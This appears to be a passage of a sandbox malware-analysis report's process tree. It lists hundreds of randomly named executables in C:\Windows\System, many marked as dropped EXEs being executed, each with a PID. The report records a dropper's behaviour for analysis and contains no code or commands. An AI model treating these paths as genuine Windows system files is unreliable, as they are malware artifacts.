- C:\Windows\System\BdHKuTt.exe
  C:\Windows\System\BdHKuTt.exe
  2⤵
  - Executes dropped EXE
  PID:3316
- C:\Windows\System\faOBgtu.exe
  C:\Windows\System\faOBgtu.exe
  2⤵
  - Executes dropped EXE
  PID:436
- C:\Windows\System\BLxPEeR.exe
  C:\Windows\System\BLxPEeR.exe
  2⤵
  - Executes dropped EXE
  PID:3024
- C:\Windows\System\kWWNUPP.exe
  C:\Windows\System\kWWNUPP.exe
  2⤵
  - Executes dropped EXE
  PID:4888
- C:\Windows\System\jJlDEJt.exe
  C:\Windows\System\jJlDEJt.exe
  2⤵
  - Executes dropped EXE
  PID:3724
- C:\Windows\System\MwDNGYR.exe
  C:\Windows\System\MwDNGYR.exe
  2⤵
  - Executes dropped EXE
  PID:396
- C:\Windows\System\KgIWbMp.exe
  C:\Windows\System\KgIWbMp.exe
  2⤵
  - Executes dropped EXE
  PID:3036
- C:\Windows\System\WbQYbiH.exe
  C:\Windows\System\WbQYbiH.exe
  2⤵
  - Executes dropped EXE
  PID:4568
- C:\Windows\System\REIupsg.exe
  C:\Windows\System\REIupsg.exe
  2⤵
  - Executes dropped EXE
  PID:1032
- C:\Windows\System\jTkZOPW.exe
  C:\Windows\System\jTkZOPW.exe
  2⤵
  - Executes dropped EXE
  PID:1948
- C:\Windows\System\ALtkyJZ.exe
  C:\Windows\System\ALtkyJZ.exe
  2⤵
  - Executes dropped EXE
  PID:4832
- C:\Windows\System\KpBVsmm.exe
  C:\Windows\System\KpBVsmm.exe
  2⤵
  - Executes dropped EXE
  PID:384
- C:\Windows\System\QeZxRqk.exe
  C:\Windows\System\QeZxRqk.exe
  2⤵
  - Executes dropped EXE
  PID:4048
- C:\Windows\System\UGvfyeL.exe
  C:\Windows\System\UGvfyeL.exe
  2⤵
  - Executes dropped EXE
  PID:4868
- C:\Windows\System\kvzFOjb.exe
  C:\Windows\System\kvzFOjb.exe
  2⤵
  - Executes dropped EXE
  PID:4028
- C:\Windows\System\DSyHoEn.exe
  C:\Windows\System\DSyHoEn.exe
  2⤵
  - Executes dropped EXE
  PID:2324
- C:\Windows\System\sOHMhHM.exe
  C:\Windows\System\sOHMhHM.exe
  2⤵
  - Executes dropped EXE
  PID:2212
- C:\Windows\System\wvpPtjy.exe
  C:\Windows\System\wvpPtjy.exe
  2⤵
  - Executes dropped EXE
  PID:3312
- C:\Windows\System\MqFMztZ.exe
  C:\Windows\System\MqFMztZ.exe
  2⤵
  - Executes dropped EXE
  PID:1172
- C:\Windows\System\eEyVDeU.exe
  C:\Windows\System\eEyVDeU.exe
  2⤵
  - Executes dropped EXE
  PID:64
- C:\Windows\System\dZaPHGq.exe
  C:\Windows\System\dZaPHGq.exe
  2⤵
  - Executes dropped EXE
  PID:3252
- C:\Windows\System\UTPglcc.exe
  C:\Windows\System\UTPglcc.exe
  2⤵
  - Executes dropped EXE
  PID:1668
- C:\Windows\System\mKRsDSk.exe
  C:\Windows\System\mKRsDSk.exe
  2⤵
  - Executes dropped EXE
  PID:5080
- C:\Windows\System\MAGZvbD.exe
  C:\Windows\System\MAGZvbD.exe
  2⤵
  - Executes dropped EXE
  PID:628
- C:\Windows\System\rcMPVbM.exe
  C:\Windows\System\rcMPVbM.exe
  2⤵
  - Executes dropped EXE
  PID:4452
- C:\Windows\System\WWATppl.exe
  C:\Windows\System\WWATppl.exe
  2⤵
  - Executes dropped EXE
  PID:4720
- C:\Windows\System\xRWykvd.exe
  C:\Windows\System\xRWykvd.exe
  2⤵
  - Executes dropped EXE
  PID:3960
- C:\Windows\System\TRGYyJi.exe
  C:\Windows\System\TRGYyJi.exe
  2⤵
  - Executes dropped EXE
  PID:3964
- C:\Windows\System\zcKSpZw.exe
  C:\Windows\System\zcKSpZw.exe
  2⤵
  - Executes dropped EXE
  PID:4536
- C:\Windows\System\OYpWZNt.exe
  C:\Windows\System\OYpWZNt.exe
  2⤵
  - Executes dropped EXE
  PID:3120
- C:\Windows\System\gmbFRsU.exe
  C:\Windows\System\gmbFRsU.exe
  2⤵
  - Executes dropped EXE
  PID:3532
- C:\Windows\System\aCxYrhi.exe
  C:\Windows\System\aCxYrhi.exe
  2⤵
  - Executes dropped EXE
  PID:4884
- C:\Windows\System\rDfCGyE.exe
  C:\Windows\System\rDfCGyE.exe
  2⤵
  - Executes dropped EXE
  PID:2464
- C:\Windows\System\YViBCHS.exe
  C:\Windows\System\YViBCHS.exe
  2⤵
  - Executes dropped EXE
  PID:4472
- C:\Windows\System\LorwJwK.exe
  C:\Windows\System\LorwJwK.exe
  2⤵
  - Executes dropped EXE
  PID:428
- C:\Windows\System\fKtcLkP.exe
  C:\Windows\System\fKtcLkP.exe
  2⤵
  - Executes dropped EXE
  PID:2008
- C:\Windows\System\ngKmbBM.exe
  C:\Windows\System\ngKmbBM.exe
  2⤵
  - Executes dropped EXE
  PID:2288
- C:\Windows\System\DfBLxdU.exe
  C:\Windows\System\DfBLxdU.exe
  2⤵
  - Executes dropped EXE
  PID:976
- C:\Windows\System\QJWPpbJ.exe
  C:\Windows\System\QJWPpbJ.exe
  2⤵
  - Executes dropped EXE
  PID:3000
- C:\Windows\System\iKQHbAk.exe
  C:\Windows\System\iKQHbAk.exe
  2⤵
  - Executes dropped EXE
  PID:5020
- C:\Windows\System\ZWMohQQ.exe
  C:\Windows\System\ZWMohQQ.exe
  2⤵
  - Executes dropped EXE
  PID:1364
- C:\Windows\System\aDXoyqI.exe
  C:\Windows\System\aDXoyqI.exe
  2⤵
  - Executes dropped EXE
  PID:4948
- C:\Windows\System\lNRQLXi.exe
  C:\Windows\System\lNRQLXi.exe
  2⤵
  - Executes dropped EXE
  PID:1636
- C:\Windows\System\tqRfDer.exe
  C:\Windows\System\tqRfDer.exe
  2⤵
  - Executes dropped EXE
  PID:3444
- C:\Windows\System\hSLfslE.exe
  C:\Windows\System\hSLfslE.exe
  2⤵
  - Executes dropped EXE
  PID:2192
- C:\Windows\System\NFPeYRO.exe
  C:\Windows\System\NFPeYRO.exe
  2⤵
  - Executes dropped EXE
  PID:2536
- C:\Windows\System\ZnFhJts.exe
  C:\Windows\System\ZnFhJts.exe
  2⤵
  - Executes dropped EXE
  PID:4556
- C:\Windows\System\YJYMAic.exe
  C:\Windows\System\YJYMAic.exe
  2⤵
  - Executes dropped EXE
  PID:4712
- C:\Windows\System\hFFVKaw.exe
  C:\Windows\System\hFFVKaw.exe
  2⤵
  - Executes dropped EXE
  PID:2088
- C:\Windows\System\MzFEZqN.exe
  C:\Windows\System\MzFEZqN.exe
  2⤵
  - Executes dropped EXE
  PID:3660
- C:\Windows\System\ojQyEAf.exe
  C:\Windows\System\ojQyEAf.exe
  2⤵
  - Executes dropped EXE
  PID:3448
- C:\Windows\System\hqzMHNt.exe
  C:\Windows\System\hqzMHNt.exe
  2⤵
  - Executes dropped EXE
  PID:3604
- C:\Windows\System\hXKWzqY.exe
  C:\Windows\System\hXKWzqY.exe
  2⤵
  - Executes dropped EXE
  PID:3152
- C:\Windows\System\ESohjZh.exe
  C:\Windows\System\ESohjZh.exe
  2⤵
  - Executes dropped EXE
  PID:3300
- C:\Windows\System\LoNRtOG.exe
  C:\Windows\System\LoNRtOG.exe
  2⤵
  - Executes dropped EXE
  PID:4788
- C:\Windows\System\XYinnyd.exe
  C:\Windows\System\XYinnyd.exe
  2⤵
  - Executes dropped EXE
  PID:4768
- C:\Windows\System\UOnTDfL.exe
  C:\Windows\System\UOnTDfL.exe
  2⤵
  - Executes dropped EXE
  PID:1120
- C:\Windows\System\RWXBmAj.exe
  C:\Windows\System\RWXBmAj.exe
  2⤵
  - Executes dropped EXE
  PID:1632
- C:\Windows\System\mOHptDr.exe
  C:\Windows\System\mOHptDr.exe
  2⤵
  - Executes dropped EXE
  PID:2844
- C:\Windows\System\AVzIQhk.exe
  C:\Windows\System\AVzIQhk.exe
  2⤵
  - Executes dropped EXE
  PID:4372
- C:\Windows\System\TyMqEVu.exe
  C:\Windows\System\TyMqEVu.exe
  2⤵
  - Executes dropped EXE
  PID:1292
- C:\Windows\System\zXHAoJW.exe
  C:\Windows\System\zXHAoJW.exe
  2⤵
  PID:468
- C:\Windows\System\rPWJbzs.exe
  C:\Windows\System\rPWJbzs.exe
  2⤵
  PID:2316
- C:\Windows\System\sViJYcS.exe
  C:\Windows\System\sViJYcS.exe
  2⤵
  PID:2772
- C:\Windows\System\fWXRLaw.exe
  C:\Windows\System\fWXRLaw.exe
  2⤵
  PID:1052
- C:\Windows\System\tXywHhp.exe
  C:\Windows\System\tXywHhp.exe
  2⤵
  PID:5052
- C:\Windows\System\CWnFHsy.exe
  C:\Windows\System\CWnFHsy.exe
  2⤵
  PID:3168
- C:\Windows\System\NBOpilL.exe
  C:\Windows\System\NBOpilL.exe
  2⤵
  PID:3564
- C:\Windows\System\DphcgJc.exe
  C:\Windows\System\DphcgJc.exe
  2⤵
  PID:1440
- C:\Windows\System\IGGbCPZ.exe
  C:\Windows\System\IGGbCPZ.exe
  2⤵
  PID:1452
- C:\Windows\System\BxyInZa.exe
  C:\Windows\System\BxyInZa.exe
  2⤵
  PID:1096
- C:\Windows\System\GduYSun.exe
  C:\Windows\System\GduYSun.exe
  2⤵
  PID:2104
- C:\Windows\System\PixZYgQ.exe
  C:\Windows\System\PixZYgQ.exe
  2⤵
  PID:4548
- C:\Windows\System\ekbiJHX.exe
  C:\Windows\System\ekbiJHX.exe
  2⤵
  PID:1308
- C:\Windows\System\OQMUmSO.exe
  C:\Windows\System\OQMUmSO.exe
  2⤵
  PID:2516
- C:\Windows\System\LVRKsFo.exe
  C:\Windows\System\LVRKsFo.exe
  2⤵
  PID:5088
- C:\Windows\System\cRnuPaR.exe
  C:\Windows\System\cRnuPaR.exe
  2⤵
  PID:4592
- C:\Windows\System\zOgSxqR.exe
  C:\Windows\System\zOgSxqR.exe
  2⤵
  PID:1784
- C:\Windows\System\uGujfyW.exe
  C:\Windows\System\uGujfyW.exe
  2⤵
  PID:224
- C:\Windows\System\oygwOre.exe
  C:\Windows\System\oygwOre.exe
  2⤵
  PID:464
- C:\Windows\System\DfUFylM.exe
  C:\Windows\System\DfUFylM.exe
  2⤵
  PID:3920
- C:\Windows\System\nFailYs.exe
  C:\Windows\System\nFailYs.exe
  2⤵
  PID:3648
- C:\Windows\System\MWXqABd.exe
  C:\Windows\System\MWXqABd.exe
  2⤵
  PID:5140
- C:\Windows\System\sdsHQrv.exe
  C:\Windows\System\sdsHQrv.exe
  2⤵
  PID:5196
- C:\Windows\System\mWUSgcS.exe
  C:\Windows\System\mWUSgcS.exe
  2⤵
  PID:5232
- C:\Windows\System\xTHMAez.exe
  C:\Windows\System\xTHMAez.exe
  2⤵
  PID:5272
- C:\Windows\System\YGqFBWX.exe
  C:\Windows\System\YGqFBWX.exe
  2⤵
  PID:5316
- C:\Windows\System\fREfsXo.exe
  C:\Windows\System\fREfsXo.exe
  2⤵
  PID:5332
- C:\Windows\System\ZBJofeI.exe
  C:\Windows\System\ZBJofeI.exe
  2⤵
  PID:5368
- C:\Windows\System\PeVxsnL.exe
  C:\Windows\System\PeVxsnL.exe
  2⤵
  PID:5412
- C:\Windows\System\HJyTzbd.exe
  C:\Windows\System\HJyTzbd.exe
  2⤵
  PID:5464
- C:\Windows\System\AOKnwKb.exe
  C:\Windows\System\AOKnwKb.exe
  2⤵
  PID:5520
- C:\Windows\System\IYyAKiI.exe
  C:\Windows\System\IYyAKiI.exe
  2⤵
  PID:5564
- C:\Windows\System\CnAQkeX.exe
  C:\Windows\System\CnAQkeX.exe
  2⤵
  PID:5592
- C:\Windows\System\bUTahbs.exe
  C:\Windows\System\bUTahbs.exe
  2⤵
  PID:5612
- C:\Windows\System\ORtOurG.exe
  C:\Windows\System\ORtOurG.exe
  2⤵
  PID:5656
- C:\Windows\System\ZllDNqu.exe
  C:\Windows\System\ZllDNqu.exe
  2⤵
  PID:5688
- C:\Windows\System\RmTObbm.exe
  C:\Windows\System\RmTObbm.exe
  2⤵
  PID:5716
- C:\Windows\System\AoDlWcK.exe
  C:\Windows\System\AoDlWcK.exe
  2⤵
  PID:5760
- C:\Windows\System\MLJmauz.exe
  C:\Windows\System\MLJmauz.exe
  2⤵
  PID:5808
- C:\Windows\System\ldQfTwe.exe
  C:\Windows\System\ldQfTwe.exe
  2⤵
  PID:5828
- C:\Windows\System\aLrapjF.exe
  C:\Windows\System\aLrapjF.exe
  2⤵
  PID:5856
- C:\Windows\System\TCxbetY.exe
  C:\Windows\System\TCxbetY.exe
  2⤵
  PID:5876
- C:\Windows\System\qALlwxI.exe
  C:\Windows\System\qALlwxI.exe
  2⤵
  PID:5912
- C:\Windows\System\LzQlILN.exe
  C:\Windows\System\LzQlILN.exe
  2⤵
  PID:5940
- C:\Windows\System\jfINfpx.exe
  C:\Windows\System\jfINfpx.exe
  2⤵
  PID:5976
- C:\Windows\System\ixgJfzw.exe
  C:\Windows\System\ixgJfzw.exe
  2⤵
  PID:6000
- C:\Windows\System\KPDwkvg.exe
  C:\Windows\System\KPDwkvg.exe
  2⤵
  PID:6032
- C:\Windows\System\QhaPDNW.exe
  C:\Windows\System\QhaPDNW.exe
  2⤵
  PID:6052
- C:\Windows\System\omNwhTS.exe
  C:\Windows\System\omNwhTS.exe
  2⤵
  PID:6088
- C:\Windows\System\GYHcVfR.exe
  C:\Windows\System\GYHcVfR.exe
  2⤵
  PID:6108
- C:\Windows\System\MLwhawe.exe
  C:\Windows\System\MLwhawe.exe
  2⤵
  PID:2196
- C:\Windows\System\xnUWpbn.exe
  C:\Windows\System\xnUWpbn.exe
  2⤵
  PID:5164
- C:\Windows\System\fxiZJPJ.exe
  C:\Windows\System\fxiZJPJ.exe
  2⤵
  PID:5288
- C:\Windows\System\FgcQTyN.exe
  C:\Windows\System\FgcQTyN.exe
  2⤵
  PID:5348
- C:\Windows\System\ymETJyY.exe
  C:\Windows\System\ymETJyY.exe
  2⤵
  PID:5460
- C:\Windows\System\syrdvIf.exe
  C:\Windows\System\syrdvIf.exe
  2⤵
  PID:5552
- C:\Windows\System\gVHBmiy.exe
  C:\Windows\System\gVHBmiy.exe
  2⤵
  PID:5604
- C:\Windows\System\mLHQDPD.exe
  C:\Windows\System\mLHQDPD.exe
  2⤵
  PID:5712
- C:\Windows\System\ChIkVSI.exe
  C:\Windows\System\ChIkVSI.exe
  2⤵
  PID:5796
- C:\Windows\System\CFgtRaj.exe
  C:\Windows\System\CFgtRaj.exe
  2⤵
  PID:5864
- C:\Windows\System\QwDLMBM.exe
  C:\Windows\System\QwDLMBM.exe
  2⤵
  PID:5904
- C:\Windows\System\HoPcxzI.exe
  C:\Windows\System\HoPcxzI.exe
  2⤵
  PID:5996
- C:\Windows\System\qPshQQX.exe
  C:\Windows\System\qPshQQX.exe
  2⤵
  PID:6044
- C:\Windows\System\AeYqHfQ.exe
  C:\Windows\System\AeYqHfQ.exe
  2⤵
  PID:6096
- C:\Windows\System\noAxBEu.exe
  C:\Windows\System\noAxBEu.exe
  2⤵
  PID:5152
- C:\Windows\System\nbBbtBN.exe
  C:\Windows\System\nbBbtBN.exe
  2⤵
  PID:5528
- C:\Windows\System\SqZfagJ.exe
  C:\Windows\System\SqZfagJ.exe
  2⤵
  PID:5668
- C:\Windows\System\uZOxkId.exe
  C:\Windows\System\uZOxkId.exe
  2⤵
  PID:5768
- C:\Windows\System\CovPRKe.exe
  C:\Windows\System\CovPRKe.exe
  2⤵
  PID:5988
- C:\Windows\System\lbJpKmE.exe
  C:\Windows\System\lbJpKmE.exe
  2⤵
  PID:4672
- C:\Windows\System\MlqEaiv.exe
  C:\Windows\System\MlqEaiv.exe
  2⤵
  PID:5328
- C:\Windows\System\yJThLbe.exe
  C:\Windows\System\yJThLbe.exe
  2⤵
  PID:5700
- C:\Windows\System\vSkritj.exe
  C:\Windows\System\vSkritj.exe
  2⤵
  PID:320
- C:\Windows\System\sFOvlfX.exe
  C:\Windows\System\sFOvlfX.exe
  2⤵
  PID:5952
- C:\Windows\System\GfVtUoN.exe
  C:\Windows\System\GfVtUoN.exe
  2⤵
  PID:6156
- C:\Windows\System\cGZvYPl.exe
  C:\Windows\System\cGZvYPl.exe
  2⤵
  PID:6184
- C:\Windows\System\hyvcVMr.exe
  C:\Windows\System\hyvcVMr.exe
  2⤵
  PID:6212
- C:\Windows\System\JTTmqCs.exe
  C:\Windows\System\JTTmqCs.exe
  2⤵
  PID:6228
- C:\Windows\System\yPtjEgo.exe
  C:\Windows\System\yPtjEgo.exe
  2⤵
  PID:6248
- C:\Windows\System\jLPpzro.exe
  C:\Windows\System\jLPpzro.exe
  2⤵
  PID:6300
- C:\Windows\System\nYQQMjr.exe
  C:\Windows\System\nYQQMjr.exe
  2⤵
  PID:6324
- C:\Windows\System\QsHeurj.exe
  C:\Windows\System\QsHeurj.exe
  2⤵
  PID:6352
- C:\Windows\System\GrnZfcL.exe
  C:\Windows\System\GrnZfcL.exe
  2⤵
  PID:6372
- C:\Windows\System\cpxIrnR.exe
  C:\Windows\System\cpxIrnR.exe
  2⤵
  PID:6408
- C:\Windows\System\ubANGqu.exe
  C:\Windows\System\ubANGqu.exe
  2⤵
  PID:6424
- C:\Windows\System\zcxTVxZ.exe
  C:\Windows\System\zcxTVxZ.exe
  2⤵
  PID:6460
- C:\Windows\System\wocUrbX.exe
  C:\Windows\System\wocUrbX.exe
  2⤵
  PID:6484
- C:\Windows\System\nsgsTNI.exe
  C:\Windows\System\nsgsTNI.exe
  2⤵
  PID:6528
- C:\Windows\System\oZGNjzA.exe
  C:\Windows\System\oZGNjzA.exe
  2⤵
  PID:6548
- C:\Windows\System\nwBSNAF.exe
  C:\Windows\System\nwBSNAF.exe
  2⤵
  PID:6568
- C:\Windows\System\aGqSzQc.exe
  C:\Windows\System\aGqSzQc.exe
  2⤵
  PID:6604
- C:\Windows\System\TfqfiAg.exe
  C:\Windows\System\TfqfiAg.exe
  2⤵
  PID:6632
- C:\Windows\System\MdQjxHI.exe
  C:\Windows\System\MdQjxHI.exe
  2⤵
  PID:6648
- C:\Windows\System\fDJXajr.exe
  C:\Windows\System\fDJXajr.exe
  2⤵
  PID:6688
- C:\Windows\System\WBlXabQ.exe
  C:\Windows\System\WBlXabQ.exe
  2⤵
  PID:6716
- C:\Windows\System\cMLTaBn.exe
  C:\Windows\System\cMLTaBn.exe
  2⤵
  PID:6732
- C:\Windows\System\UQiNnPi.exe
  C:\Windows\System\UQiNnPi.exe
  2⤵
  PID:6760
- C:\Windows\System\BmMsmEd.exe
  C:\Windows\System\BmMsmEd.exe
  2⤵
  PID:6796
- C:\Windows\System\SYmhnOM.exe
  C:\Windows\System\SYmhnOM.exe
  2⤵
  PID:6824
- C:\Windows\System\ettXheu.exe
  C:\Windows\System\ettXheu.exe
  2⤵
  PID:6848
- C:\Windows\System\jvMMGtZ.exe
  C:\Windows\System\jvMMGtZ.exe
  2⤵
  PID:6880
- C:\Windows\System\IySxeMj.exe
  C:\Windows\System\IySxeMj.exe
  2⤵
  PID:6912
- C:\Windows\System\OGZeZTM.exe
  C:\Windows\System\OGZeZTM.exe
  2⤵
  PID:6936
- C:\Windows\System\OvgBMVE.exe
  C:\Windows\System\OvgBMVE.exe
  2⤵
  PID:6956
- C:\Windows\System\nKVUVBz.exe
  C:\Windows\System\nKVUVBz.exe
  2⤵
  PID:6972
- C:\Windows\System\aVdtBoP.exe
  C:\Windows\System\aVdtBoP.exe
  2⤵
  PID:7012
- C:\Windows\System\KanNqcp.exe
  C:\Windows\System\KanNqcp.exe
  2⤵
  PID:7040
- C:\Windows\System\WhcTPbS.exe
  C:\Windows\System\WhcTPbS.exe
  2⤵
  PID:7080
- C:\Windows\System\ASDPrpJ.exe
  C:\Windows\System\ASDPrpJ.exe
  2⤵
  PID:7100
- C:\Windows\System\QPiAgwu.exe
  C:\Windows\System\QPiAgwu.exe
  2⤵
  PID:7132
- C:\Windows\System\GeIHGwu.exe
  C:\Windows\System\GeIHGwu.exe
  2⤵
  PID:7164
- C:\Windows\System\YzKwoDz.exe
  C:\Windows\System\YzKwoDz.exe
  2⤵
  PID:6204
- C:\Windows\System\KkfBOKI.exe
  C:\Windows\System\KkfBOKI.exe
  2⤵
  PID:6256
- C:\Windows\System\OwbTjDu.exe
  C:\Windows\System\OwbTjDu.exe
  2⤵
  PID:6292
- C:\Windows\System\wmyrdwn.exe
  C:\Windows\System\wmyrdwn.exe
  2⤵
  PID:6360
- C:\Windows\System\LWmkonr.exe
  C:\Windows\System\LWmkonr.exe
  2⤵
  PID:6436
- C:\Windows\System\ertTgPM.exe
  C:\Windows\System\ertTgPM.exe
  2⤵
  PID:6536
- C:\Windows\System\ZLTkNnw.exe
  C:\Windows\System\ZLTkNnw.exe
  2⤵
  PID:6584
- C:\Windows\System\FvEFXqo.exe
  C:\Windows\System\FvEFXqo.exe
  2⤵
  PID:6644
- C:\Windows\System\cSmQdXl.exe
  C:\Windows\System\cSmQdXl.exe
  2⤵
  PID:6724
- C:\Windows\System\KVCYxDL.exe
  C:\Windows\System\KVCYxDL.exe
  2⤵
  PID:6820
- C:\Windows\System\MGLfkFf.exe
  C:\Windows\System\MGLfkFf.exe
  2⤵
  PID:6856
- C:\Windows\System\ZpruhZW.exe
  C:\Windows\System\ZpruhZW.exe
  2⤵
  PID:6928
- C:\Windows\System\qGktEQM.exe
  C:\Windows\System\qGktEQM.exe
  2⤵
  PID:7000
- C:\Windows\System\LJYigch.exe
  C:\Windows\System\LJYigch.exe
  2⤵
  PID:7028
- C:\Windows\System\CIiVUiW.exe
  C:\Windows\System\CIiVUiW.exe
  2⤵
  PID:7108
- C:\Windows\System\lrRpEnT.exe
  C:\Windows\System\lrRpEnT.exe
  2⤵
  PID:6224
- C:\Windows\System\RJWvjbB.exe
  C:\Windows\System\RJWvjbB.exe
  2⤵
  PID:3752
- C:\Windows\System\yBnkSuY.exe
  C:\Windows\System\yBnkSuY.exe
  2⤵
  PID:6544
- C:\Windows\System\wrchyZg.exe
  C:\Windows\System\wrchyZg.exe
  2⤵
  PID:6708
- C:\Windows\System\oOparKP.exe
  C:\Windows\System\oOparKP.exe
  2⤵
  PID:6920
- C:\Windows\System\gBQVGaj.exe
  C:\Windows\System\gBQVGaj.exe
  2⤵
  PID:7148
- C:\Windows\System\gNhctEj.exe
  C:\Windows\System\gNhctEj.exe
  2⤵
  PID:6496
- C:\Windows\System\ONuggzH.exe
  C:\Windows\System\ONuggzH.exe
  2⤵
  PID:7120
- C:\Windows\System\CLZiFvR.exe
  C:\Windows\System\CLZiFvR.exe
  2⤵
  PID:6792
- C:\Windows\System\FcRYLCv.exe
  C:\Windows\System\FcRYLCv.exe
  2⤵
  PID:6168
- C:\Windows\System\HzFNant.exe
  C:\Windows\System\HzFNant.exe
  2⤵
  PID:7180
- C:\Windows\System\vEGfCrf.exe
  C:\Windows\System\vEGfCrf.exe
  2⤵
  PID:7212
- C:\Windows\System\OtRznkf.exe
  C:\Windows\System\OtRznkf.exe
  2⤵
  PID:7248
- C:\Windows\System\eMgnHSc.exe
  C:\Windows\System\eMgnHSc.exe
  2⤵
  PID:7276
- C:\Windows\System\ErdyEfe.exe
  C:\Windows\System\ErdyEfe.exe
  2⤵
  PID:7296
- C:\Windows\System\LsgrTXL.exe
  C:\Windows\System\LsgrTXL.exe
  2⤵
  PID:7320
- C:\Windows\System\vKPBEnk.exe
  C:\Windows\System\vKPBEnk.exe
  2⤵
  PID:7356
- C:\Windows\System\zlsIxKb.exe
  C:\Windows\System\zlsIxKb.exe
  2⤵
  PID:7376
- C:\Windows\System\hnzEkvv.exe
  C:\Windows\System\hnzEkvv.exe
  2⤵
  PID:7404
- C:\Windows\System\raRWDhj.exe
  C:\Windows\System\raRWDhj.exe
  2⤵
  PID:7444
- C:\Windows\System\dvkDSjA.exe
  C:\Windows\System\dvkDSjA.exe
  2⤵
  PID:7464
- C:\Windows\System\LplqIND.exe
  C:\Windows\System\LplqIND.exe
  2⤵
  PID:7488
- C:\Windows\System\dBYaOuO.exe
  C:\Windows\System\dBYaOuO.exe
  2⤵
  PID:7516
- C:\Windows\System\zAaXxcT.exe
  C:\Windows\System\zAaXxcT.exe
  2⤵
  PID:7560
- C:\Windows\System\qUgENjI.exe
  C:\Windows\System\qUgENjI.exe
  2⤵
  PID:7588
- C:\Windows\System\hUxIgaa.exe
  C:\Windows\System\hUxIgaa.exe
  2⤵
  PID:7612
- C:\Windows\System\xtUCTgi.exe
  C:\Windows\System\xtUCTgi.exe
  2⤵
  PID:7628
- C:\Windows\System\hPJYnLj.exe
  C:\Windows\System\hPJYnLj.exe
  2⤵
  PID:7648
- C:\Windows\System\qaqWkzs.exe
  C:\Windows\System\qaqWkzs.exe
  2⤵
  PID:7684
- C:\Windows\System\yzaMIGO.exe
  C:\Windows\System\yzaMIGO.exe
  2⤵
  PID:7716
- C:\Windows\System\pkcqQEM.exe
  C:\Windows\System\pkcqQEM.exe
  2⤵
  PID:7756
- C:\Windows\System\KaYqCJV.exe
  C:\Windows\System\KaYqCJV.exe
  2⤵
  PID:7772
- C:\Windows\System\PmIvTLr.exe
  C:\Windows\System\PmIvTLr.exe
  2⤵
  PID:7812
- C:\Windows\System\JTZiAda.exe
  C:\Windows\System\JTZiAda.exe
  2⤵
  PID:7828
- C:\Windows\System\oDrMXrX.exe
  C:\Windows\System\oDrMXrX.exe
  2⤵
  PID:7856
- C:\Windows\System\kcSzqPg.exe
  C:\Windows\System\kcSzqPg.exe
  2⤵
  PID:7872
- C:\Windows\System\eKtMifm.exe
  C:\Windows\System\eKtMifm.exe
  2⤵
  PID:7912
- C:\Windows\System\BqJuYKa.exe
  C:\Windows\System\BqJuYKa.exe
  2⤵
  PID:7940
- C:\Windows\System\tDXaDAU.exe
  C:\Windows\System\tDXaDAU.exe
  2⤵
  PID:7984
- C:\Windows\System\XtpzbXl.exe
  C:\Windows\System\XtpzbXl.exe
  2⤵
  PID:8008
- C:\Windows\System\vvnJwAu.exe
  C:\Windows\System\vvnJwAu.exe
  2⤵
  PID:8036
- C:\Windows\System\kApwQjc.exe
  C:\Windows\System\kApwQjc.exe
  2⤵
  PID:8052
- C:\Windows\System\bCCoWLO.exe
  C:\Windows\System\bCCoWLO.exe
  2⤵
  PID:8080
- C:\Windows\System\eNuXXpc.exe
  C:\Windows\System\eNuXXpc.exe
  2⤵
  PID:8108
- C:\Windows\System\PPUxnQw.exe
  C:\Windows\System\PPUxnQw.exe
  2⤵
  PID:8148
- C:\Windows\System\QFelztN.exe
  C:\Windows\System\QFelztN.exe
  2⤵
  PID:8164
- C:\Windows\System\BBvVEnI.exe
  C:\Windows\System\BBvVEnI.exe
  2⤵
  PID:7172
- C:\Windows\System\FefPMni.exe
  C:\Windows\System\FefPMni.exe
  2⤵
  PID:7396
- C:\Windows\System\pSEhwkx.exe
  C:\Windows\System\pSEhwkx.exe
  2⤵
  PID:7440
- C:\Windows\System\wpkpbTf.exe
  C:\Windows\System\wpkpbTf.exe
  2⤵
  PID:7472
- C:\Windows\System\xIodsAG.exe
  C:\Windows\System\xIodsAG.exe
  2⤵
  PID:7552
- C:\Windows\System\PbfnnYm.exe
  C:\Windows\System\PbfnnYm.exe
  2⤵
  PID:7620
- C:\Windows\System\cHRJrpv.exe
  C:\Windows\System\cHRJrpv.exe
  2⤵
  PID:7660
- C:\Windows\System\onsmAOj.exe
  C:\Windows\System\onsmAOj.exe
  2⤵
  PID:7752
- C:\Windows\System\ZtZWgTC.exe
  C:\Windows\System\ZtZWgTC.exe
  2⤵
  PID:7820
- C:\Windows\System\yLFPYIt.exe
  C:\Windows\System\yLFPYIt.exe
  2⤵
  PID:7900
- C:\Windows\System\aPAutuC.exe
  C:\Windows\System\aPAutuC.exe
  2⤵
  PID:7964
- C:\Windows\System\bUtsyTD.exe
  C:\Windows\System\bUtsyTD.exe
  2⤵
  PID:8024
- C:\Windows\System\iIfeoUN.exe
  C:\Windows\System\iIfeoUN.exe
  2⤵
  PID:8072
- C:\Windows\System\yoDrsai.exe
  C:\Windows\System\yoDrsai.exe
  2⤵
  PID:8160
- C:\Windows\System\xxHwLgW.exe
  C:\Windows\System\xxHwLgW.exe
  2⤵
  PID:7196
- C:\Windows\System\NpMIqaO.exe
  C:\Windows\System\NpMIqaO.exe
  2⤵
  PID:7476
- C:\Windows\System\vqWNCEB.exe
  C:\Windows\System\vqWNCEB.exe
  2⤵
  PID:7604
- C:\Windows\System\nqvNUVF.exe
  C:\Windows\System\nqvNUVF.exe
  2⤵
  PID:7784
- C:\Windows\System\TpxEwBU.exe
  C:\Windows\System\TpxEwBU.exe
  2⤵
  PID:7864
- C:\Windows\System\FExNmsZ.exe
  C:\Windows\System\FExNmsZ.exe
  2⤵
  PID:8000
- C:\Windows\System\XsiDscv.exe
  C:\Windows\System\XsiDscv.exe
  2⤵
  PID:7220
- C:\Windows\System\wWBkdaL.exe
  C:\Windows\System\wWBkdaL.exe
  2⤵
  PID:7664
- C:\Windows\System\CuaVpug.exe
  C:\Windows\System\CuaVpug.exe
  2⤵
  PID:7644
- C:\Windows\System\cUdXjTu.exe
  C:\Windows\System\cUdXjTu.exe
  2⤵
  PID:7800
- C:\Windows\System\uyRUzIb.exe
  C:\Windows\System\uyRUzIb.exe
  2⤵
  PID:8196
- C:\Windows\System\JVCOvww.exe
  C:\Windows\System\JVCOvww.exe
  2⤵
  PID:8224
- C:\Windows\System\dSXzgcs.exe
  C:\Windows\System\dSXzgcs.exe
  2⤵
  PID:8252
- C:\Windows\System\tepGejr.exe
  C:\Windows\System\tepGejr.exe
  2⤵
  PID:8280
- C:\Windows\System\aqinDNF.exe
  C:\Windows\System\aqinDNF.exe
  2⤵
  PID:8308
- C:\Windows\System\TLsPNZq.exe
